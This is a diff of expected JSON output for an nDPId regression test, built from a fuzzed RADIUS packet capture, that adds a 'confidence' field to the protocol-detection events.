 01356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1528998347284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528998347284,"pkt":"AAAMB6xAABRP+4rqCABFAALHIV9AAP8RAAAKDEAexuIZNXJpBxQCswAAAa8Cq915o4ky+NTjcjv0F1wXmegaCgAAV8gOBFVTGgwAADHIDQZ3aWZpGg8AAFfICRlXSVNQUjEwGgkAADghDQM0NwZbIqnLATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDEjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQw72UwLTAwOlYlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjaTAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NSUAZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3UwasFAEQIA5WWldDMlRlc3SHYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAA+8R0Z7LSWHOP9VffmhYCuAwIAIG5bieAaFAAAV8gHDlZaV0MyVGVzdExhahoKAABXyAgERVQaEAAA+8gKClN0YW5kYXJkGhAAAFfICwhUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkpiEQAAV8gRC055bmRodXJzdBoMACU4yKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00718{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528998347461,"pkt":"ABRP+4rqcNuYVcUnqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528998257171,"flow_last_seen":1528998257456,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":334,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528998257171,"flow_last_seen":1528998257456,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":334,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1528998372930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998372930,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWBAAP8RAAAKDEAexuIZFXIQBxQCxwAAAbACvzQe93K2s3Upjyh7NVxn+MAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqnkATUwMzExNDgwMjMyNTY4NjMxkHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGggAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDDyMDAw\/jJtNGE5MjI1YiwgNWIyMmE5ZTQvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAQAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzcCAQA4ATAzMTE0ODAyMzI1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAclAFpXQzJUZXN0TGEiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGlAAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWld0QzIgVGVzdCBMYWIaCwAAV8klBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOG4RBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bbJpcmVjdBoMAAAFgwcGwFBKmVASj8JRxOD8ARCA2Tk5GozLCQ=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528998257171,"flow_last_seen":1528998257456,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":334,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1528998257171,"flow_last_seen":1528998257456,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":334,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1528998226997,"flow_last_seen":1528998376770,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":21868,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1528998226997,"flow_last_seen":1528998376770,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":21868,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
